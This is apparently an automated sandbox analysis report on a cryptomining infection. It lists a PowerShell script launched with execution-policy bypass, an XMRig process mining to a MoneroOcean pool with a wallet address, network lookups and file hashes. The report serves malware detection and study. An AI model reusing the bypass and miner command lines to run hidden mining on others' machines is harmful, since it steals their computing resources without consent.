Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (11) - copia.ps1"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4212,i,6593821857742176458,13646536021844995125,262144 --variations-seed-version --mojo-platform-channel-handle=4016 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3812,i,6593821857742176458,13646536021844995125,262144 --variations-seed-version --mojo-platform-channel-handle=4476 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 81.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 121.150.79.40.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ra5bsgoo.cwi.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3
